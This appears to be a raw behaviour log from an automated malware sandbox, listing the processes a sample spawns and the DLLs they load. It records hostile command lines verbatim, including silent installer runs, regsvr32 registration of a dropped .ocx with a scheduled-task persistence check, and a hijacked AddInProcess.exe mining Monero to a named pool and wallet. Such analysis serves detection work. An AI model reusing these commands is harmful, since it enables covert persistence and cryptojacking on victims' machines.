                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhost
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp" /SL5="$C0210,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp" /SL5="$901FC,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
                              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe "C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe "C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.bat" "Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp" /SL5="$C0210,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp" /SL5="$901FC,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
                              Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: mstask.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: dui70.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: duser.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: chartv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: atlthunk.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: explorerframe.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: cryptnet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: amsi.dll
